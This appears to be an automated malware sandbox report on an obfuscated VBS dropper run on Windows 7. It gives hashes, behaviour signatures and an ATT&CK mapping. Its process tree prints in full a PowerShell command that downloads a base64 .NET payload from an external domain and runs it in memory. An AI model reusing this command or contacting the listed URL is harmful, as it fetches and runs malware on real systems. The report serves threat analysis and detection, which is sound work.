Analysis

  • max time kernel
    44s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    23-09-2022 07:00

General

  • Target

    518a1bd0764ca25fcf36d8a55bf2ebd9.vbs

  • Size

    238KB

  • MD5

    518a1bd0764ca25fcf36d8a55bf2ebd9

  • SHA1

    d6e490cdf33972c115a035631a3db91e527b0ef3

  • SHA256

    c410684799d2bc68f9f06e206381e7f1fc6336642df8d48346a9b3357ada7db4

  • SHA512

    b746019d51c04f97c75bbbe6ae65a74521120cb73aefee0a306c09088b2b1905d25f78c5b7e220962c2c34d11dd8bff082fef8056557acdb404e577dfcf0613b

  • SSDEEP

    48:sK0mjzlXJj5NzzBWsoMtssbs0Qs+PM/d9Z9s3XEHDzzAA:sKDF9n0JMtswebEjAsDoA

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://contadoreshbc.com/dll_startup

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\518a1bd0764ca25fcf36d8a55bf2ebd9.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('https://contadoreshbc.com/dll_startup'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('1=rev&a=psid?txt.4abeurp/esacfeirB/moc.sotercnocmc@aretrac/emoh/moc.sotercnocmc.liam//:sptth'))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1732

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1732-55-0x0000000000000000-mapping.dmp
  • memory/1732-57-0x000007FEF3BC0000-0x000007FEF45E3000-memory.dmp
    Filesize

    10.1MB

  • memory/1732-58-0x000007FEF3060000-0x000007FEF3BBD000-memory.dmp
    Filesize

    11.4MB

  • memory/1732-59-0x0000000002944000-0x0000000002947000-memory.dmp
    Filesize

    12KB

  • memory/1732-60-0x000000001B710000-0x000000001BA0F000-memory.dmp
    Filesize

    3.0MB

  • memory/1732-61-0x000000000294B000-0x000000000296A000-memory.dmp
    Filesize

    124KB

  • memory/1732-62-0x0000000002944000-0x0000000002947000-memory.dmp
    Filesize

    12KB

  • memory/1732-63-0x000000000294B000-0x000000000296A000-memory.dmp
    Filesize

    124KB

  • memory/1988-54-0x000007FEFBF41000-0x000007FEFBF43000-memory.dmp
    Filesize

    8KB